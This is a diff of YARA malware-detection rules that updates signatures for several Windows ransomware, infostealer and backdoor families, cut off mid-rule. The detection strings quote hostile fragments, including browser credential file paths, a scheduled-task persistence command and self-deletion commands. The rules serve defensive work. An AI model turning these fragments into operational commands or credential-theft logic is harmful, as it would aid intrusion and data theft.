"0a858058-310a-5b1c-a6fe-abdec7b25abe" - date = "2024-09-06" - modified = "2024-09-06" + id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5432-L5448" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3459-L3481" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Fonix" strings: - $s1 = "libvlc_add_intf" fullword ascii - $s2 = "libvlc_dllonexit" fullword ascii - $s3 = "libvlc_getmainargs" fullword ascii - $s4 = "libvlc_initenv" fullword ascii - $s5 = "libvlc_set_app_id" fullword ascii - $s6 = "libvlc_set_app_type" fullword ascii - $s7 = "libvlc_set_user_agent" fullword ascii - $s8 = "libvlc_wait" fullword ascii - $s9 = "dll.dll" fullword ascii + $s1 = "dontcryptanyway" fullword wide + $s2 = "Cpriv.key" ascii wide + $s3 = "Cpub.key" ascii wide + $s4 = "NetShareEnum() failed!Error: % ld" fullword wide + $s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide + $s6 = "Encryption Completed !!!" fullword wide + $s7 = "kill process" fullword ascii + $s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii + $id1 = "].FONIX" fullword wide + $id2 = "xinofconfig.txt" fullword ascii wide + $id3 = "XINOF4MUTEX" wide + $id4 = ":\\Fonix\\cryptoPP\\" ascii + $id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii + $id6 = "Ransomware\\Fonix" ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (6 of ($s*) or 3 of ($id*) or (1 of ($id*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE +rule DITEKSHEN_MALWARE_Win_Bobik : FILE { meta: - description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware" + description = "Detects Bobik infostealer" author = "ditekSHen" - id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8" - date = "2024-09-06" - modified = "2024-09-06" + id = "12f14151-0c89-519d-85d3-4b4b82a950a3" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5450-L5474" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3483-L3498" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Bobik" strings: - $s1 = "\\cmd.exe /A" fullword wide - $s2 = "C:\\windows\\explorer.exe" fullword wide - $s3 = "\\\\.\\pipe\\testpipe" fullword wide - $s4 = "Elevation:Administrator!new:{" wide - $s5 = "log.log" fullword wide - $s6 = "%s\\%d.exe" fullword wide - $s7 = ".?AVTPipeProtocol@@" fullword ascii - $s8 = ".?AVTCaptureMgr@@" fullword ascii - $s9 = "system-%d" fullword wide - $s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide - $s11 = "\\..\\data.dat" fullword wide - $s12 = "\\..\\config.ini" fullword wide - $s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 } - $s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 } - $cnc1 = "https://%s:%d/ajax" fullword wide - $cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide - $cnc3 = "139.180.208.225" fullword wide + $s1 = "@Default\\Login Data" fullword ascii + $s2 = "@Default\\Cookies" fullword ascii + $s3 = "@logins.json" fullword ascii + $s4 = "@[EXECUTE]" fullword ascii + $s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii + $s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii + $s7 = "threads.nim" fullword ascii condition: - uint16(0)==0x5a4d and (7 of ($s*) or (2 of ($cnc*) and 2 of ($s*))) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE +rule DITEKSHEN_MALWARE_Win_Runningrat : FILE { meta: - description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware" + description = "Detects RunningRAT" author = "ditekSHen" - id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f" - date = "2024-09-06" - modified = "2024-09-06" + id = "161faa8c-614e-5102-bb6d-c1ed4abf8274" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5512-L5527" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3500-L3536" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63" score = 75 - quality = 75 + quality = 23 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.RunningRAT" strings: - $s1 = "ServiceCrtMain" fullword ascii - $s2 = "mpsvc.dll" fullword ascii - $o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 } - $o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 } - $o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 } - $o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 } - $o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc } - $o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 } + $s1 = "%s%d.dll" fullword ascii + $s2 = "/c ping 127.0.0.1 -n" ascii + $s3 = "del /f/q \"%s\"" ascii + $s4 = "GUpdate" fullword ascii + $s5 = "%s\\%d.bak" fullword ascii + $s6 = "\"%s\",MainThread" ascii + $s7 = "rundll32.exe" fullword ascii + $rev1 = "emankcosteg" fullword ascii + $rev2 = "ini.revreS\\" fullword ascii + $rev3 = "daerhTniaM,\"s%\" s%" ascii + $rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii + $rev5 = "---DNE yromeMmorFdaoL" fullword ascii + $rev6 = "eMnigulP" fullword ascii + $rev7 = "exe.23lldnuR\\" fullword ascii + $rev8 = "dnammoc\\nepo\\llehs\\" ascii + $rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii + $rev10 = "emanybtsohteg" fullword ascii + $rev11 = "tekcosesolc" fullword ascii + $rev12 = "tpokcostes" fullword ascii + $rev13 = "emantsohteg" fullword ascii + $v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii + $v2_2 = "LoadFromMemory END---" fullword ascii + $v2_3 = "hmProxy!= NULL" fullword ascii + $v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii + $v2_5 = "ipip.website" fullword ascii + $v2_6 = "%d*%sMHz" fullword ascii + $v2_7 = "\\Server.ini" fullword ascii condition: - uint16(0)==0x5a4d and all of ($s*) and 5 of ($o*) + uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($rev*) or 6 of ($v*) or 8 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE { meta: - description = "Detects Zeoticus ransomware" + description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable" author = "ditekSHen" - id = "6d1096dd-d075-54eb-ade9-48e2f945145d" - date = "2024-09-06" - modified = "2024-09-06" + id = "a8a72484-42be-5c5c-962b-75bed8acdf39" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5529-L5549" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3538-L3551" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.DLAgent05" strings: - $s1 = "Dear %s" fullword wide - $s2 = "\\??\\UNC\\%s\\%s\\" wide - $s3 = "\\\\%ws\\admin$\\%ws" wide - $s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide - $s5 = "process call create" wide - $s6 = ">----===Zeoticus" ascii - $s7 = "ZEOTICUSV2" ascii - $s8 = "GetExtendedTcpTable" fullword ascii - $s9 = "SHAMROckSWTF" ascii - $s10 = "NTDLL.RtlAllocateHeap" fullword ascii - $s11 = ".pandora" fullword wide - $s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 } - $pdb = "_cryptor\\shell_gen\\Release\\" ascii + $s1 = "MARCUS.dll" fullword ascii wide + $s2 = "GZipStream" fullword ascii + $s3 = "MemoryStream" fullword ascii + $s4 = "proj_name" fullword ascii + $s5 = "res_name" fullword ascii condition: - uint16(0)==0x5a4d and (6 of ($s*) or ($pdb)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE +rule DITEKSHEN_MALWARE_Win_Nemty : FILE { meta: - description = "Detects downloader agent" + description = "Detects Nemty/Nefilim ransomware" author = "ditekSHen" - id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53" - date = "2024-09-06" - modified = "2024-09-06" + id = "361269c6-5215-5ecf-869c-3c55ff8387e1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5551-L5564" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3553-L3577" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37" score = 75 quality = 75 tags = "FILE" strings: - $pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii - $s1 = "DownloadFile" fullword ascii - $s2 = "ZipFile" fullword ascii - $s3 = "WebClient" fullword ascii - $s4 = "ExtractToDirectory" fullword ascii - $s5 = "System Clear" fullword ascii + $s1 = "Go build ID:" ascii + $s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii + $s3 = "crypto/x509.ExtKeyUsage" ascii + $s4 = "crypto/x509.KeyUsageContentCommitment" ascii + $s5 = "DEK-Info header" ascii + $s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii + $s7 = "*( - < = > k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii + $s8 = "Go cmd/compile go1.10" fullword ascii + $s9 = ".dllprogramdatarecycle.bin" ascii + $s10 = ".dll.exe.lnk.sys.url" ascii + $vx1_1 = "Fa1led to os.OpenFile()" ascii + $vx1_2 = "-HELP.txt" ascii + $vf1_1 = "main.CTREncrypt" fullword ascii + $vf1_2 = "main.FileSearch" fullword ascii + $vf1_3 = "main.getdrives" fullword ascii + $vf1_4 = "main.RSAEncrypt" fullword ascii + $vf1_5 = "main.SaveNote" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or (($pdb) and 4 of ($s*))) + uint16(0)==0x5a4d and (9 of ($s*) or ( all of ($vx*) and 2 of ($s*)) or all of ($vf*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE +rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE { meta: - description = "Detects SoftCNApp" + description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware" author = "ditekSHen" - id = "473442e2-d411-5e2b-948e-c7ce034a5810" - date = "2024-09-06" - modified = "2024-09-06" + id = "3ef5643a-f2af-5d62-8927-e46679e069c2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5566-L5583" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3579-L3607" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii - $s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii - $s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii - $s4 = ".?AVCHPPlugin@@" fullword ascii - $s5 = ".?AVCHPCmd@@" fullword ascii - $s6 = ".?AVCHPExplorer@@" fullword ascii - $s7 = "%s\\svchost.exe -O" fullword wide - $s8 = "\"%s\\%s\" -P" fullword ascii - $n1 = "45.63.58.34" fullword ascii - $n2 = "127.0.0.1" fullword ascii + $go = "Go build ID:" ascii + $s1 = "Encrypting %s..." ascii + $s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii + $s3 = "main.deleteRecycleBin" ascii + $s4 = "main.encryptFiles" ascii + $s5 = "main.antiVirtualBox" ascii + $s6 = "main.antiVmware" ascii + $s7 = "main.deleteShadows" ascii + $s8 = "main.delUAC" ascii + $s9 = "main.KillProcess" ascii + $s10 = "main.delExploit" ascii + $s11 = "main.encrypt" ascii + $s12 = "main.ClearLogDownload" ascii + $s13 = "main.ClearLog" ascii + $s14 = "main.EndEncrypt" ascii + $s15 = "main.RunFuckLogAndSoft" ascii + $s16 = "main.ClearUsercache" ascii + $s17 = "main.FirstDuty" ascii + $s18 = ".lockedv1" ascii + $s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii + $s20 = "net stop " ascii condition: - uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($n*) and 2 of ($s*))) + uint16(0)==0x5a4d and $go and 6 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE +rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE { meta: - description = "Detects Covenant Grunt Stager" + description = "Detects Alfonoso / Shurk / HunterStealer infostealer" author = "ditekSHen" - id = "61495541-ed9c-5227-aa50-cbaeacfb20a2" - date = "2024-09-06" - modified = "2024-09-06" + id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5585-L5606" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3609-L3638" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26" score = 75 - quality = 75 + quality = 50 tags = "FILE" + snort2_sid = "920102" + snort3_sid = "920100" + clamav_sig = "MALWARE.Win.Trojan.Alfonso" strings: - $x1 = "VXNlci1BZ2VudA" ascii wide - $x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide - $x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide - $x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide - $x5 = "L2VuLXVzL" ascii wide - $x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide - $x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide - $s1 = "ExecuteStager" ascii - $s2 = "UseCertPinning" fullword ascii - $s3 = "FromBase64String" fullword ascii - $s4 = "ToBase64String" fullword ascii - $s5 = "DownloadString" fullword ascii - $s6 = "UploadString" fullword ascii - $s7 = "GetWebRequest" fullword ascii + $s1 = "%s\\etilqs_" fullword ascii + $s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii + $s3 = "%s-mj%08X" fullword ascii + $s4 = "| Site:" ascii + $s5 = "| Login:" ascii + $s6 = "| Password:" ascii + $s7 = "| BUILD NAME:" ascii + $s8 = "recursive_directory_iterator" ascii + $s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00 + 2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00 + 2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a + 00 00 00 00 } + $s10 = "Shurk Steal" fullword ascii + $s11 = ":memory:" fullword ascii + $s12 = "current_path()" fullword ascii + $s13 = "vtab:%p:%p" fullword ascii + $f1 = "chatlog.txt" ascii + $f2 = "servers.fav" ascii + $f3 = "\\USERDATA.DAT" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or all of ($s*) or (1 of ($x*) and 5 of ($s*))) + uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($s*) and 2 of ($f*)) or ( all of ($f*) and 5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Fabookie : FILE +rule DITEKSHEN_MALWARE_Win_Vidar : FILE { meta: - description = "Detects Fabookie / ElysiumStealer" + description = "Detects Vidar / ArkeiStealer" author = "ditekSHen" - id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa" - date = "2024-09-06" - modified = "2024-09-06" + id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5608-L5624" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3640-L3650" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "rwinssyslog" fullword wide - $s2 = "_kasssperskdy" fullword wide - $s3 = "[Title:%s]" fullword wide - $s4 = "[Execute]" fullword wide - $s5 = "[Snapshot]" fullword wide - $s6 = "Mozilla/4.0 (compatible)" fullword wide - $s7 = "d-k netsvcs" fullword wide - $s8 = "facebook.websmails.com" fullword wide - $s9 = "CUdpClient::Start" fullword ascii + $s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii + $s2 = "screenshot.jpg" fullword wide + $s3 = "Content-Disposition: form-data; name=\"" ascii condition: - ( uint16(0)==0x5a4d or uint16(0)==0x0805) and 6 of them + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE +rule DITEKSHEN_MALWARE_Win_Babuk : FILE { meta: - description = "Detects CobianRAT, a fork of Njrat" + description = "Detects Babuk ransomware" author = "ditekSHen" - id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886" - date = "2024-09-06" - modified = "2024-09-06" + id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5626-L5640" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3652-L3674" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "1.0.40.7" fullword wide - $s2 = "DownloadData" fullword wide - $s3 = "Executed As" fullword wide - $s4 = "\\Plugins" fullword wide - $s5 = "LOGIN" fullword wide - $s6 = "software\\microsoft\\windows\\currentversion\\run" wide - $s7 = "Hidden" fullword wide + $s1 = "ecdh_pub_k.bin" wide + $s2 = "How To Restore Your Files.txt" wide + $s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase + $s4 = "/login.php?id=" ascii + $s5 = "http://babuk" ascii + $s6 = "bootsect.bak" fullword wide + $s7 = "Can't open file after killHolder" ascii + $s8 = "Can't OpenProcess" ascii + $s9 = "DoYouWantToHaveSexWithCuongDong" ascii + $arg1 = "-lanfirst" fullword ascii + $arg2 = "-lansecond" fullword ascii + $arg3 = "-nolan" fullword ascii + $arg4 = "shares" fullword wide + $arg5 = "paths" fullword wide + $arg6 = "gdebug" fullword wide condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (3 of ($s*) or (3 of ($arg*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Leivion : FILE +rule DITEKSHEN_MALWARE_Win_Nitol : FILE { meta: - description = "Detects Leivion" + description = "Detects Nitol backdoor" author = "ditekSHen" - id = "77800add-8fff-5657-9ed6-a23517bce0b1" - date = "2024-09-06" - modified = "2024-09-06" + id = "d545f826-11ff-5d0f-9a95-8232b19d35b6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5660-L5673" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3676-L3704" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii - $s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii - $s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii - $s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii - $s5 = "/var/lib/veil/go/src/os/exec_" ascii - $s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii + $s1 = "%$#@!.aspGET ^&*().htmlGET" ascii + $s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii + $s3 = "taskkill /f /im rundll32.exe" fullword ascii + $s4 = "\\Tencent\\Users\\*.*" fullword ascii + $s5 = "[Pause Break]" fullword ascii + $s6 = ":]%d-%d-%d %d:%d:%d" fullword ascii + $s7 = "GET %s HTTP/1.1" fullword ascii + $s8 = "GET %s%s HTTP/1.1" fullword ascii + $s9 = "Accept-Language: zh-cn" fullword ascii + $s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii + $s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii + $s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii + $w1 = ".aspGET" ascii + $w2 = ".htmGET" ascii + $w3 = ".htmlGET" ascii + $domain = "www.xy999.com" fullword ascii + $v2_1 = "loglass" fullword ascii + $v2_2 = "rlehgs" fullword ascii + $v2_3 = "eherrali" fullword ascii + $v2_4 = "agesrlu" fullword ascii + $v2_5 = "lepejagas" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (5 of ($s*) or ( all of ($v2*)) or ($domain and 3 of them ) or (#w1>2 and #w2>2 and #w3>2 and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Banload : FILE +rule DITEKSHEN_MALWARE_Win_Strongpity : FILE { meta: - description = "Detects Banload" + description = "Detects StrongPity" author = "ditekSHen" - id = "4672bce1-1280-576d-b7df-f0181a854058" - date = "2024-09-06" - modified = "2024-09-06" + id = "9dcc5edb-5c86-5412-af63-f88d488d5829" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5675-L5688" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3706-L3720" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "main.die" fullword ascii - $s2 = "main.postResults" fullword ascii - $s3 = "main.checkin" fullword ascii - $s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii - $s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii - $s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii + $s1 = "Boundary%08X" ascii wide + $s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii + $s3 = "%sfilename=\"%ls\"" fullword ascii + $s4 = "name=%ls&delete=" fullword ascii + $s5 = "Content-Type: application/octet-stream" fullword ascii + $s6 = "cmd.exe /C ping" wide + $s7 = "& rmdir /Q /S \"" wide condition: uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_TYRAT : FILE +rule DITEKSHEN_MALWARE_Win_Jssloader : FILE { meta: - description = "Detects TYRAT" + description = "Detects JSSLoader RAT/backdoor" author = "ditekSHen" - id = 